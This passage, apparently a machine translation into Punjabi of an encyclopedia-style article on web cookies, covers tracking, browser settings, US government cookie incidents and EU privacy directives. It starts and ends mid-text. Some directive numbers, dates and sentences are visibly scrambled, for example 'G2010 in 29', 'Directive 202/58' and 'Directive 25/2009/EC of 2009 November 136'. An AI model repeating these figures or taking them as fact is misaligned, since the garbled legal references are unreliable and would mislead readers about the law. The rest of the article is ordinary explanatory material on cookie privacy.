ਪਹਿਲਾਂ ਹੀ ਮੌਜੂਦ ਹੈ। 2005 ਵਿੱਚ, ਜੁਪੀਟਰ ਰਿਸਰਚ ਨੇ ਇੱਕ ਅਧਿਐਨ ਦੇ ਨਤੀਜੇ ਪ੍ਰਕਾਸ਼ਿਤ ਕੀਤੇ, ਜਿਸ ਵਿੱਚ ਉੱਤਰਦਾਤਾਵਾਂ ਦੇ ਇੱਕ ਮਹੱਤਵਪੂਰਨ ਪ੍ਰਤੀਸ਼ਤ ਨੇ ਹੇਠਾਂ ਦਿੱਤੇ ਬਿਆਨਾਂ 'ਤੇ ਵਿਚਾਰ ਕੀਤਾ:
- ਕੂਕੀਜ਼ ਵਰਗੇ ਹਨ ਵਾਇਰਸ, ਉਹ ਉਪਭੋਗਤਾਵਾਂ ਦੀਆਂ ਹਾਰਡ ਡਰਾਈਵਾਂ ਨੂੰ ਪ੍ਰਭਾਵਿਤ ਕਰਦੇ ਹਨ।
- ਕੂਕੀਜ਼ ਤਿਆਰ ਕਰਦੇ ਹਨ ਪੋਪ - ਅਪ.
- ਕੂਕੀਜ਼ ਭੇਜਣ ਲਈ ਵਰਤੀਆਂ ਜਾਂਦੀਆਂ ਹਨ ਸਪੈਮ.
- ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਸਿਰਫ਼ ਇਸ਼ਤਿਹਾਰਬਾਜ਼ੀ ਲਈ ਕੀਤੀ ਜਾਂਦੀ ਹੈ।
ਕੂਕੀਜ਼ ਉਪਭੋਗਤਾ ਦੇ ਕੰਪਿਊਟਰ ਤੋਂ ਜਾਣਕਾਰੀ ਨੂੰ ਮਿਟਾ ਜਾਂ ਪੜ੍ਹ ਨਹੀਂ ਸਕਦੇ ਹਨ। ਹਾਲਾਂਕਿ, ਕੂਕੀਜ਼ ਕਿਸੇ ਦਿੱਤੀ ਗਈ ਸਾਈਟ ਜਾਂ ਸਾਈਟਾਂ ਦੇ ਸਮੂਹ 'ਤੇ ਉਪਭੋਗਤਾ ਦੁਆਰਾ ਵੇਖੇ ਗਏ ਵੈਬ ਪੇਜਾਂ ਦਾ ਪਤਾ ਲਗਾਉਣਾ ਸੰਭਵ ਬਣਾਉਂਦੀਆਂ ਹਨ। ਇਹ ਜਾਣਕਾਰੀ ਇੱਕ ਉਪਭੋਗਤਾ ਪ੍ਰੋਫਾਈਲ ਵਿੱਚ ਇਕੱਠੀ ਕੀਤੀ ਜਾ ਸਕਦੀ ਹੈ ਜੋ ਤੀਜੀ ਧਿਰ ਨੂੰ ਵਰਤੀ ਜਾਂ ਦੁਬਾਰਾ ਵੇਚੀ ਜਾ ਸਕਦੀ ਹੈ, ਜਿਸ ਨਾਲ ਗੋਪਨੀਯਤਾ ਦੇ ਗੰਭੀਰ ਮੁੱਦੇ ਪੈਦਾ ਹੋ ਸਕਦੇ ਹਨ। ਕੁਝ ਪ੍ਰੋਫਾਈਲ ਅਗਿਆਤ ਹਨ, ਇਸ ਅਰਥ ਵਿੱਚ ਕਿ ਉਹਨਾਂ ਵਿੱਚ ਕੋਈ ਨਿੱਜੀ ਜਾਣਕਾਰੀ ਨਹੀਂ ਹੈ, ਫਿਰ ਵੀ ਅਜਿਹੇ ਪ੍ਰੋਫਾਈਲਾਂ ਸ਼ੱਕੀ ਹੋ ਸਕਦੀਆਂ ਹਨ।
ਉਸੇ ਅਧਿਐਨ ਦੇ ਅਨੁਸਾਰ, ਇੰਟਰਨੈਟ ਉਪਭੋਗਤਾਵਾਂ ਦਾ ਇੱਕ ਵੱਡਾ ਪ੍ਰਤੀਸ਼ਤ ਇਹ ਨਹੀਂ ਜਾਣਦਾ ਕਿ ਕੂਕੀਜ਼ ਨੂੰ ਕਿਵੇਂ ਮਿਟਾਉਣਾ ਹੈ. ਲੋਕਾਂ ਦੇ ਕੂਕੀਜ਼ 'ਤੇ ਭਰੋਸਾ ਨਾ ਕਰਨ ਦਾ ਇੱਕ ਕਾਰਨ ਇਹ ਹੈ ਕਿ ਕੁਝ ਸਾਈਟਾਂ ਨੇ ਕੂਕੀਜ਼ ਦੇ ਨਿੱਜੀ ਤੌਰ 'ਤੇ ਪਛਾਣਨ ਵਾਲੇ ਪਹਿਲੂ ਦੀ ਦੁਰਵਰਤੋਂ ਕੀਤੀ ਹੈ ਅਤੇ ਇਸ ਜਾਣਕਾਰੀ ਨੂੰ ਹੋਰ ਸਰੋਤਾਂ ਨਾਲ ਸਾਂਝਾ ਕੀਤਾ ਹੈ। ਨਿਸ਼ਾਨਾ ਇਸ਼ਤਿਹਾਰਬਾਜ਼ੀ ਅਤੇ ਅਣਚਾਹੇ ਈਮੇਲ ਦਾ ਇੱਕ ਵੱਡਾ ਪ੍ਰਤੀਸ਼ਤ, ਸਪੈਮ ਮੰਨਿਆ ਜਾਂਦਾ ਹੈ, ਟਰੈਕਿੰਗ ਕੂਕੀਜ਼ ਤੋਂ ਇਕੱਠੀ ਕੀਤੀ ਜਾਣਕਾਰੀ ਤੋਂ ਆਉਂਦਾ ਹੈ।
ਬ੍ਰਾਊਜ਼ਰ ਸੈਟਿੰਗਾਂ
ਜ਼ਿਆਦਾਤਰ ਬ੍ਰਾਊਜ਼ਰ ਕੂਕੀਜ਼ ਦਾ ਸਮਰਥਨ ਕਰਦੇ ਹਨ ਅਤੇ ਉਪਭੋਗਤਾ ਨੂੰ ਉਹਨਾਂ ਨੂੰ ਅਯੋਗ ਕਰਨ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦੇ ਹਨ। ਸਭ ਤੋਂ ਆਮ ਵਿਕਲਪ ਹਨ:
- ਕੂਕੀਜ਼ ਨੂੰ ਪੂਰੀ ਤਰ੍ਹਾਂ ਸਮਰੱਥ ਜਾਂ ਅਯੋਗ ਕਰੋ, ਤਾਂ ਜੋ ਉਹ ਲਗਾਤਾਰ ਸਵੀਕਾਰ ਜਾਂ ਬਲੌਕ ਕੀਤੀਆਂ ਜਾਣ।
- ਬ੍ਰਾਊਜ਼ਰ ਦੇ ਐਡਰੈੱਸ ਬਾਰ ਵਿੱਚ javascript: alert(document.cookie) ਦਾਖਲ ਕਰਕੇ ਉਪਭੋਗਤਾ ਨੂੰ ਦਿੱਤੇ ਗਏ ਪੰਨੇ ਵਿੱਚ ਕਿਰਿਆਸ਼ੀਲ ਕੂਕੀਜ਼ ਦੇਖਣ ਦੀ ਇਜਾਜ਼ਤ ਦਿਓ। ਕੁਝ ਬ੍ਰਾਊਜ਼ਰ ਉਪਭੋਗਤਾ ਲਈ ਇੱਕ ਕੂਕੀ ਪ੍ਰਬੰਧਕ ਸ਼ਾਮਲ ਕਰਦੇ ਹਨ ਜੋ ਵਰਤਮਾਨ ਵਿੱਚ ਬ੍ਰਾਊਜ਼ਰ ਦੁਆਰਾ ਸਟੋਰ ਕੀਤੀਆਂ ਕੂਕੀਜ਼ ਨੂੰ ਦੇਖ ਅਤੇ ਮਿਟਾ ਸਕਦਾ ਹੈ।
ਜ਼ਿਆਦਾਤਰ ਬ੍ਰਾਊਜ਼ਰ ਨਿੱਜੀ ਡੇਟਾ ਨੂੰ ਪੂਰੀ ਤਰ੍ਹਾਂ ਮਿਟਾਉਣ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦੇ ਹਨ ਜਿਸ ਵਿੱਚ ਕੂਕੀਜ਼ ਸ਼ਾਮਲ ਹਨ। ਕੂਕੀ ਅਨੁਮਤੀਆਂ ਨੂੰ ਨਿਯੰਤਰਿਤ ਕਰਨ ਲਈ ਵਾਧੂ ਮਾਡਿਊਲ ਵੀ ਮੌਜੂਦ ਹਨ।
ਗੋਪਨੀਯਤਾ ਅਤੇ ਤੀਜੀ-ਧਿਰ ਕੂਕੀਜ਼
ਇਸ ਫਰਜ਼ੀ ਉਦਾਹਰਣ ਵਿੱਚ, ਇੱਕ ਵਿਗਿਆਪਨ ਕੰਪਨੀ ਨੇ ਦੋ ਵੈੱਬਸਾਈਟਾਂ 'ਤੇ ਬੈਨਰ ਲਗਾਏ ਹਨ। ਆਪਣੇ ਸਰਵਰਾਂ 'ਤੇ ਬੈਨਰਾਂ ਦੀ ਮੇਜ਼ਬਾਨੀ ਕਰਕੇ ਅਤੇ ਤੀਜੀ ਧਿਰ ਦੀਆਂ ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਕਰਕੇ, ਵਿਗਿਆਪਨ ਕੰਪਨੀ ਇਹਨਾਂ ਦੋ ਸਾਈਟਾਂ ਰਾਹੀਂ ਉਪਭੋਗਤਾ ਦੇ ਨੈਵੀਗੇਸ਼ਨ ਨੂੰ ਟਰੈਕ ਕਰਨ ਦੇ ਯੋਗ ਹੈ।
ਕੂਕੀਜ਼ ਦੇ ਵੈੱਬ ਉਪਭੋਗਤਾਵਾਂ ਦੀ ਗੋਪਨੀਯਤਾ ਅਤੇ ਅਗਿਆਤਤਾ ਲਈ ਮਹੱਤਵਪੂਰਨ ਪ੍ਰਭਾਵ ਹੁੰਦੇ ਹਨ। ਹਾਲਾਂਕਿ ਕੂਕੀਜ਼ ਨੂੰ ਸਿਰਫ਼ ਉਸ ਸਰਵਰ 'ਤੇ ਵਾਪਸ ਭੇਜਿਆ ਜਾਂਦਾ ਹੈ ਜੋ ਉਹਨਾਂ ਨੂੰ ਸੈੱਟ ਕਰਦਾ ਹੈ ਜਾਂ ਉਸੇ ਇੰਟਰਨੈੱਟ ਡੋਮੇਨ ਨਾਲ ਸਬੰਧਤ ਸਰਵਰ ਨੂੰ, ਵੈਬ ਪੇਜ ਵਿੱਚ ਹਾਲਾਂਕਿ ਹੋਰ ਡੋਮੇਨਾਂ ਨਾਲ ਸਬੰਧਤ ਸਰਵਰਾਂ 'ਤੇ ਸਟੋਰ ਕੀਤੇ ਚਿੱਤਰ ਜਾਂ ਹੋਰ ਭਾਗ ਹੋ ਸਕਦੇ ਹਨ। ਕੂਕੀਜ਼ ਜੋ ਇਹਨਾਂ ਬਾਹਰੀ ਭਾਗਾਂ ਦੀ ਰਿਕਵਰੀ ਦੌਰਾਨ ਸੈੱਟ ਕੀਤੀਆਂ ਜਾਂਦੀਆਂ ਹਨ, ਨੂੰ ਕਿਹਾ ਜਾਂਦਾ ਹੈ ਤੀਜੀ ਧਿਰ ਕੂਕੀਜ਼. ਇਸ ਵਿੱਚ ਅਣਚਾਹੇ ਪੌਪ-ਅੱਪ ਵਿੰਡੋਜ਼ ਤੋਂ ਕੂਕੀਜ਼ ਸ਼ਾਮਲ ਹਨ।
ਵਿਗਿਆਪਨ ਕੰਪਨੀਆਂ ਉਹਨਾਂ ਵੱਖ-ਵੱਖ ਸਾਈਟਾਂ 'ਤੇ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਟਰੈਕ ਕਰਨ ਲਈ ਤੀਜੀ ਧਿਰ ਦੀਆਂ ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਕਰਦੀਆਂ ਹਨ ਜਿਨ੍ਹਾਂ 'ਤੇ ਉਹ ਜਾਂਦੇ ਹਨ। ਖਾਸ ਤੌਰ 'ਤੇ, ਇੱਕ ਵਿਗਿਆਪਨ ਕੰਪਨੀ ਇੱਕ ਉਪਭੋਗਤਾ ਨੂੰ ਉਹਨਾਂ ਸਾਰੇ ਪੰਨਿਆਂ ਵਿੱਚ ਟ੍ਰੈਕ ਕਰ ਸਕਦੀ ਹੈ ਜਿੱਥੇ ਉਸਨੇ ਵਿਗਿਆਪਨ ਚਿੱਤਰ ਜਾਂ ਇੱਕ ਟਰੈਕਿੰਗ ਪਿਕਸਲ ਰੱਖਿਆ ਹੈ। ਉਪਭੋਗਤਾ ਦੁਆਰਾ ਵਿਜ਼ਿਟ ਕੀਤੇ ਪੰਨਿਆਂ ਦਾ ਗਿਆਨ ਵਿਗਿਆਪਨ ਕੰਪਨੀ ਨੂੰ ਉਪਭੋਗਤਾ ਦੀਆਂ ਵਿਗਿਆਪਨ ਤਰਜੀਹਾਂ ਨੂੰ ਨਿਸ਼ਾਨਾ ਬਣਾਉਣ ਦੀ ਆਗਿਆ ਦਿੰਦਾ ਹੈ।
ਉਪਭੋਗਤਾ ਪ੍ਰੋਫਾਈਲ ਬਣਾਉਣ ਦੀ ਯੋਗਤਾ ਨੂੰ ਕੁਝ ਲੋਕਾਂ ਦੁਆਰਾ ਗੋਪਨੀਯਤਾ ਦੇ ਹਮਲੇ ਵਜੋਂ ਮੰਨਿਆ ਜਾਂਦਾ ਹੈ, ਖਾਸ ਤੌਰ 'ਤੇ ਜਦੋਂ ਤੀਜੀ ਧਿਰ ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹੋਏ ਵੱਖ-ਵੱਖ ਡੋਮੇਨਾਂ ਵਿੱਚ ਟਰੈਕਿੰਗ ਕੀਤੀ ਜਾਂਦੀ ਹੈ। ਇਸ ਕਾਰਨ ਕਰਕੇ, ਕੁਝ ਦੇਸ਼ਾਂ ਵਿੱਚ ਕੂਕੀ ਕਾਨੂੰਨ ਹਨ।
ਸੰਯੁਕਤ ਰਾਜ ਸਰਕਾਰ ਨੇ 2000 ਵਿੱਚ ਕੂਕੀਜ਼ ਦੀ ਪਲੇਸਮੈਂਟ 'ਤੇ ਸਖਤ ਨਿਯਮ ਲਾਗੂ ਕੀਤੇ, ਜਦੋਂ ਇਹ ਖੁਲਾਸਾ ਹੋਇਆ ਕਿ ਵ੍ਹਾਈਟ ਹਾਊਸ ਡਰੱਗ ਪਾਲਿਸੀ ਦਫਤਰ ਔਨਲਾਈਨ ਡਰੱਗ ਵਿਗਿਆਪਨ ਦੇਖਣ ਵਾਲੇ ਉਪਭੋਗਤਾਵਾਂ ਦੇ ਕੰਪਿਊਟਰਾਂ ਨੂੰ ਟਰੈਕ ਕਰਨ ਲਈ ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਕਰ ਰਿਹਾ ਸੀ। 2002 ਵਿੱਚ, ਗੋਪਨੀਯਤਾ ਕਾਰਕੁਨ ਡੈਨੀਅਲ ਬ੍ਰਾਂਟ ਨੇ ਖੋਜ ਕੀਤੀ ਕਿ ਸੀਆਈਏ ਨੇ ਉਹਨਾਂ ਕੰਪਿਊਟਰਾਂ 'ਤੇ ਲਗਾਤਾਰ ਕੂਕੀਜ਼ ਛੱਡੀਆਂ ਜੋ ਇਸਦੀਆਂ ਵੈੱਬਸਾਈਟਾਂ 'ਤੇ ਗਏ ਸਨ। ਇੱਕ ਵਾਰ ਇਸ ਉਲੰਘਣਾ ਦੀ ਸੂਚਨਾ ਮਿਲਣ 'ਤੇ, ਸੀਆਈਏ ਨੇ ਘੋਸ਼ਣਾ ਕੀਤੀ ਕਿ ਇਹ ਕੂਕੀਜ਼ ਜਾਣਬੁੱਝ ਕੇ ਨਹੀਂ ਭੇਜੀਆਂ ਗਈਆਂ ਸਨ ਅਤੇ ਉਹਨਾਂ ਨੂੰ ਸੈੱਟ ਕਰਨਾ ਬੰਦ ਕਰ ਦਿੱਤਾ ਸੀ। 25 ਦਸੰਬਰ, 2005 ਨੂੰ, ਬ੍ਰਾਂਟ ਨੇ ਖੋਜ ਕੀਤੀ ਕਿ ਰਾਸ਼ਟਰੀ ਸੁਰੱਖਿਆ ਏਜੰਸੀ (NSA) ਨੇ ਇੱਕ ਸੌਫਟਵੇਅਰ ਅੱਪਡੇਟ ਦੇ ਕਾਰਨ ਵਿਜ਼ਟਰਾਂ ਦੇ ਕੰਪਿਊਟਰਾਂ 'ਤੇ ਦੋ ਲਗਾਤਾਰ ਕੂਕੀਜ਼ ਛੱਡ ਦਿੱਤੀਆਂ ਸਨ। ਸੂਚਿਤ ਕੀਤੇ ਜਾਣ ਤੋਂ ਬਾਅਦ, NSA ਨੇ ਤੁਰੰਤ ਕੁਕੀਜ਼ ਨੂੰ ਅਯੋਗ ਕਰ ਦਿੱਤਾ।
ਯੂਨਾਈਟਿਡ ਕਿੰਗਡਮ ਵਿੱਚ, ਦ ਕੂਕੀ ਕਾਨੂੰਨ “, 25 ਮਈ, 2012 ਨੂੰ ਲਾਗੂ ਹੋਇਆ, ਸਾਈਟਾਂ ਨੂੰ ਆਪਣੇ ਇਰਾਦਿਆਂ ਦਾ ਐਲਾਨ ਕਰਨ ਲਈ ਮਜਬੂਰ ਕਰਦਾ ਹੈ, ਇਸ ਤਰ੍ਹਾਂ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਇਹ ਚੁਣਨ ਦੀ ਇਜਾਜ਼ਤ ਦਿੰਦਾ ਹੈ ਕਿ ਕੀ ਉਹ ਇੰਟਰਨੈੱਟ 'ਤੇ ਆਪਣੇ ਬੀਤਣ ਦੇ ਨਿਸ਼ਾਨ ਛੱਡਣਾ ਚਾਹੁੰਦੇ ਹਨ ਜਾਂ ਨਹੀਂ। ਇਸ ਤਰ੍ਹਾਂ ਉਹਨਾਂ ਨੂੰ ਇਸ਼ਤਿਹਾਰਬਾਜ਼ੀ ਦੇ ਨਿਸ਼ਾਨੇ ਤੋਂ ਸੁਰੱਖਿਅਤ ਰੱਖਿਆ ਜਾ ਸਕਦਾ ਹੈ। ਹਾਲਾਂਕਿ, ਇਸਦੇ ਅਨੁਸਾਰ ਸਰਪ੍ਰਸਤ, ਇੰਟਰਨੈਟ ਉਪਭੋਗਤਾਵਾਂ ਦੀ ਸਹਿਮਤੀ ਜ਼ਰੂਰੀ ਤੌਰ 'ਤੇ ਸਪੱਸ਼ਟ ਨਹੀਂ ਹੈ; ਇਸ ਨੂੰ ਬਣਾਉਂਦੇ ਹੋਏ, ਉਪਭੋਗਤਾ ਦੀ ਸਹਿਮਤੀ ਦੀਆਂ ਸ਼ਰਤਾਂ ਵਿੱਚ ਬਦਲਾਅ ਕੀਤੇ ਗਏ ਹਨ ਇਸ ਤਰ੍ਹਾਂ ਨਿਸ਼ਚਿਤ ਹੈ.
ਗੋਪਨੀਯਤਾ 'ਤੇ ਨਿਰਦੇਸ਼ 2002/58
ਡਾਇਰੈਕਟਿਵ 202/58 ਗੋਪਨੀਯਤਾ ਅਤੇ ਇਲੈਕਟ੍ਰਾਨਿਕ ਸੰਚਾਰ, ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ 'ਤੇ ਨਿਯਮ ਰੱਖਦਾ ਹੈ। ਖਾਸ ਤੌਰ 'ਤੇ, ਇਸ ਨਿਰਦੇਸ਼ ਦੇ ਆਰਟੀਕਲ 5, ਪੈਰਾ 3 ਦੀ ਲੋੜ ਹੈ ਕਿ ਉਪਭੋਗਤਾ ਦੇ ਕੰਪਿਊਟਰ ਵਿੱਚ ਡੇਟਾ (ਜਿਵੇਂ ਕਿ ਕੂਕੀਜ਼) ਦੀ ਸਟੋਰੇਜ ਤਾਂ ਹੀ ਕੀਤੀ ਜਾ ਸਕਦੀ ਹੈ ਜੇਕਰ:
- ਉਪਭੋਗਤਾ ਨੂੰ ਜਾਣਕਾਰੀ ਦਿੱਤੀ ਜਾਂਦੀ ਹੈ ਕਿ ਡੇਟਾ ਕਿਵੇਂ ਵਰਤਿਆ ਜਾਂਦਾ ਹੈ;
- ਉਪਭੋਗਤਾ ਨੂੰ ਇਸ ਸਟੋਰੇਜ਼ ਓਪਰੇਸ਼ਨ ਤੋਂ ਇਨਕਾਰ ਕਰਨ ਦਾ ਵਿਕਲਪ ਦਿੱਤਾ ਜਾਂਦਾ ਹੈ। ਹਾਲਾਂਕਿ, ਇਸ ਲੇਖ ਵਿੱਚ ਇਹ ਵੀ ਕਿਹਾ ਗਿਆ ਹੈ ਕਿ ਤਕਨੀਕੀ ਕਾਰਨਾਂ ਕਰਕੇ ਡੇਟਾ ਦੇ ਸਟੋਰੇਜ ਨੂੰ ਇਸ ਕਾਨੂੰਨ ਤੋਂ ਛੋਟ ਹੈ।
ਅਕਤੂਬਰ 2003 ਤੋਂ ਲਾਗੂ ਕੀਤੇ ਜਾਣ ਦੇ ਕਾਰਨ, ਦਸੰਬਰ 2004 ਦੀ ਇੱਕ ਰਿਪੋਰਟ ਦੇ ਅਨੁਸਾਰ ਨਿਰਦੇਸ਼ ਨੂੰ ਸਿਰਫ ਬਹੁਤ ਹੀ ਅਪੂਰਣ ਢੰਗ ਨਾਲ ਅਮਲ ਵਿੱਚ ਲਿਆਂਦਾ ਗਿਆ ਸੀ, ਜਿਸ ਵਿੱਚ ਇਹ ਵੀ ਦੱਸਿਆ ਗਿਆ ਸੀ ਕਿ ਕੁਝ ਮੈਂਬਰ ਰਾਜਾਂ (ਸਲੋਵਾਕੀਆ, ਲਾਤਵੀਆ, ਗ੍ਰੀਸ, ਬੈਲਜੀਅਮ ਅਤੇ ਲਕਸਮਬਰਗ) ਨੇ ਅਜੇ ਤੱਕ ਇਸ ਨੂੰ ਤਬਦੀਲ ਨਹੀਂ ਕੀਤਾ ਸੀ। ਘਰੇਲੂ ਕਾਨੂੰਨ ਵਿੱਚ ਨਿਰਦੇਸ਼.
29 ਵਿੱਚ G2010 ਦੀ ਰਾਏ ਦੇ ਅਨੁਸਾਰ, ਇਹ ਨਿਰਦੇਸ਼, ਜੋ ਕਿ ਖਾਸ ਤੌਰ 'ਤੇ ਵਿਵਹਾਰ ਸੰਬੰਧੀ ਵਿਗਿਆਪਨ ਦੇ ਉਦੇਸ਼ਾਂ ਲਈ ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਦੀ ਸ਼ਰਤ ਰੱਖਦਾ ਹੈ, ਇੰਟਰਨੈਟ ਉਪਭੋਗਤਾ ਦੀ ਸਪੱਸ਼ਟ ਸਹਿਮਤੀ 'ਤੇ ਬਹੁਤ ਮਾੜਾ ਲਾਗੂ ਹੁੰਦਾ ਹੈ। ਵਾਸਤਵ ਵਿੱਚ, ਜ਼ਿਆਦਾਤਰ ਸਾਈਟਾਂ "ਤਕਨੀਕੀ" ਕੂਕੀਜ਼ ਵਿੱਚ ਫਰਕ ਕੀਤੇ ਬਿਨਾਂ, ਵਰਤੋਂ ਬਾਰੇ ਜਾਣਕਾਰੀ ਦਿੱਤੇ ਬਿਨਾਂ, "ਕੂਕੀਜ਼" ਦੀ ਵਰਤੋਂ ਬਾਰੇ ਸੂਚਿਤ ਕਰਨ ਵਾਲੇ ਇੱਕ ਸਧਾਰਨ "ਬੈਨਰ" ਤੱਕ ਆਪਣੇ ਆਪ ਨੂੰ ਸੀਮਿਤ ਕਰਕੇ, ਨਿਰਦੇਸ਼ਾਂ ਦੀ ਪਾਲਣਾ ਨਹੀਂ ਕਰਦੀਆਂ ਹਨ। "ਟਰੈਕਿੰਗ" ਕੂਕੀਜ਼, ਨਾ ਹੀ ਤਕਨੀਕੀ ਕੂਕੀਜ਼ (ਜਿਵੇਂ ਕਿ ਸ਼ਾਪਿੰਗ ਕਾਰਟ ਪ੍ਰਬੰਧਨ ਕੂਕੀਜ਼) ਨੂੰ ਬਰਕਰਾਰ ਰੱਖਣ ਅਤੇ "ਟਰੈਕਿੰਗ" ਕੂਕੀਜ਼ ਨੂੰ ਰੱਦ ਕਰਨ ਦੀ ਇੱਛਾ ਰੱਖਣ ਵਾਲੇ ਉਪਭੋਗਤਾ ਨੂੰ ਅਸਲ ਵਿਕਲਪ ਪੇਸ਼ ਕਰਨ ਲਈ। ਵਾਸਤਵ ਵਿੱਚ, ਬਹੁਤ ਸਾਰੀਆਂ ਸਾਈਟਾਂ ਸਹੀ ਢੰਗ ਨਾਲ ਕੰਮ ਨਹੀਂ ਕਰਦੀਆਂ ਹਨ ਜੇਕਰ ਕੂਕੀਜ਼ ਨੂੰ ਇਨਕਾਰ ਕਰ ਦਿੱਤਾ ਜਾਂਦਾ ਹੈ, ਜੋ ਕਿ ਨਿਰਦੇਸ਼ 2002/58 ਜਾਂ ਨਿਰਦੇਸ਼ 95/46 (ਨਿੱਜੀ ਡੇਟਾ ਦੀ ਸੁਰੱਖਿਆ) ਦੀ ਪਾਲਣਾ ਨਹੀਂ ਕਰਦਾ ਹੈ।
ਨਿਰਦੇਸ਼ਕ 2009/136/CE
ਇਸ ਸਮੱਗਰੀ ਨੂੰ 2009 ਨਵੰਬਰ, 136 ਦੇ ਡਾਇਰੈਕਟਿਵ 25/2009/EC ਦੁਆਰਾ ਅਪਡੇਟ ਕੀਤਾ ਗਿਆ ਹੈ ਜਿਸ ਵਿੱਚ ਕਿਹਾ ਗਿਆ ਹੈ ਕਿ ਕਿਸੇ ਗਾਹਕ ਜਾਂ ਉਪਭੋਗਤਾ ਦੇ ਟਰਮੀਨਲ ਉਪਕਰਣ ਵਿੱਚ "ਜਾਣਕਾਰੀ ਦਾ ਸਟੋਰੇਜ, ਜਾਂ ਪਹਿਲਾਂ ਤੋਂ ਸਟੋਰ ਕੀਤੀ ਜਾਣਕਾਰੀ ਤੱਕ ਪਹੁੰਚ ਪ੍ਰਾਪਤ ਕਰਨ ਦੀ ਇਜਾਜ਼ਤ ਸਿਰਫ ਇਸ ਸ਼ਰਤ 'ਤੇ ਦਿੱਤੀ ਜਾਂਦੀ ਹੈ ਕਿ ਗਾਹਕ ਜਾਂ ਉਪਭੋਗਤਾ ਨੇ, ਪ੍ਰਾਪਤ ਕਰਨ ਤੋਂ ਬਾਅਦ, ਨਿਰਦੇਸ਼ 95/46/EC ਦੀ ਪਾਲਣਾ ਵਿੱਚ, ਪ੍ਰਕਿਰਿਆ ਦੇ ਉਦੇਸ਼ਾਂ ਬਾਰੇ ਦੂਜਿਆਂ ਵਿਚਕਾਰ, ਸਪਸ਼ਟ ਅਤੇ ਪੂਰੀ ਜਾਣਕਾਰੀ ਦਿੱਤੀ ਹੈ। ਇਸ ਲਈ ਨਵਾਂ ਨਿਰਦੇਸ਼ ਇੰਟਰਨੈੱਟ ਉਪਭੋਗਤਾ ਦੇ ਕੰਪਿਊਟਰ 'ਤੇ ਕੂਕੀਜ਼ ਰੱਖਣ ਤੋਂ ਪਹਿਲਾਂ ਦੀਆਂ ਜ਼ਿੰਮੇਵਾਰੀਆਂ ਨੂੰ ਮਜ਼ਬੂਤ ਕਰਦਾ ਹੈ।
ਨਿਰਦੇਸ਼ਾਂ ਦੇ ਸ਼ੁਰੂਆਤੀ ਵਿਚਾਰਾਂ ਵਿੱਚ, ਯੂਰਪੀਅਨ ਵਿਧਾਇਕ ਹਾਲਾਂਕਿ ਨਿਸ਼ਚਿਤ ਕਰਦਾ ਹੈ: "ਜਿੱਥੇ ਤਕਨੀਕੀ ਤੌਰ 'ਤੇ ਸੰਭਵ ਅਤੇ ਪ੍ਰਭਾਵਸ਼ਾਲੀ, ਨਿਰਦੇਸ਼ 95/46/EC ਦੇ ਸੰਬੰਧਿਤ ਪ੍ਰਬੰਧਾਂ ਦੇ ਅਨੁਸਾਰ, ਪ੍ਰਕਿਰਿਆ ਦੇ ਸੰਬੰਧ ਵਿੱਚ ਉਪਭੋਗਤਾ ਦੀ ਸਹਿਮਤੀ ਦੁਆਰਾ ਪ੍ਰਗਟ ਕੀਤੀ ਜਾ ਸਕਦੀ ਹੈ. ਕਿਸੇ ਬ੍ਰਾਊਜ਼ਰ ਜਾਂ ਹੋਰ ਐਪਲੀਕੇਸ਼ਨ ਦੀਆਂ ਉਚਿਤ ਸੈਟਿੰਗਾਂ ਦੀ ਵਰਤੋਂ"। ਪਰ ਅਸਲ ਵਿੱਚ, ਅੱਜ ਤੱਕ ਕੋਈ ਵੀ ਬ੍ਰਾਊਜ਼ਰ ਜ਼ਰੂਰੀ ਤਕਨੀਕੀ ਕੂਕੀਜ਼ ਨੂੰ ਵਿਕਲਪਿਕ ਕੂਕੀਜ਼ ਤੋਂ ਵੱਖ ਕਰਨਾ ਸੰਭਵ ਨਹੀਂ ਬਣਾਉਂਦਾ ਜੋ ਉਪਭੋਗਤਾ ਦੀ ਪਸੰਦ 'ਤੇ ਛੱਡ ਦਿੱਤਾ ਜਾਣਾ ਚਾਹੀਦਾ ਹੈ।
ਇਹ ਨਵਾਂ ਨਿਰਦੇਸ਼ ਬੈਲਜੀਅਮ ਦੇ ਸੰਸਦ ਮੈਂਬਰਾਂ ਦੁਆਰਾ ਜੁਲਾਈ 2012 ਵਿੱਚ ਲਾਗੂ ਕੀਤਾ ਗਿਆ ਸੀ। ਇੱਕ 2014 ਅਧਿਐਨ ਦਰਸਾਉਂਦਾ ਹੈ ਕਿ ਸੰਸਦ ਮੈਂਬਰ ਵੀ ਲਾਗੂ ਕਰਨ ਲਈ ਸੰਘਰਸ਼ ਕਰਦੇ ਹਨ। ਨਿਰਦੇਸ਼ ਦੀਆਂ ਪਾਬੰਦੀਆਂ.
P3P
P3P ਨਿਰਧਾਰਨ ਵਿੱਚ ਇੱਕ ਸਰਵਰ ਲਈ ਇੱਕ ਗੋਪਨੀਯਤਾ ਨੀਤੀ ਦੱਸਣ ਦੀ ਯੋਗਤਾ ਸ਼ਾਮਲ ਹੁੰਦੀ ਹੈ, ਜੋ ਇਹ ਪਰਿਭਾਸ਼ਿਤ ਕਰਦੀ ਹੈ ਕਿ ਇਹ ਕਿਸ ਕਿਸਮ ਦੀ ਜਾਣਕਾਰੀ ਇਕੱਠੀ ਕਰਦਾ ਹੈ ਅਤੇ ਕਿਸ ਉਦੇਸ਼ ਲਈ। ਇਹਨਾਂ ਨੀਤੀਆਂ ਵਿੱਚ ਕੂਕੀਜ਼ ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਇਕੱਠੀ ਕੀਤੀ ਜਾਣਕਾਰੀ ਦੀ ਵਰਤੋਂ ਸ਼ਾਮਲ ਹੈ (ਪਰ ਇਹਨਾਂ ਤੱਕ ਸੀਮਿਤ ਨਹੀਂ ਹੈ)। P3P ਦੀਆਂ ਪਰਿਭਾਸ਼ਾਵਾਂ ਦੇ ਅਨੁਸਾਰ, ਇੱਕ ਬ੍ਰਾਊਜ਼ਰ 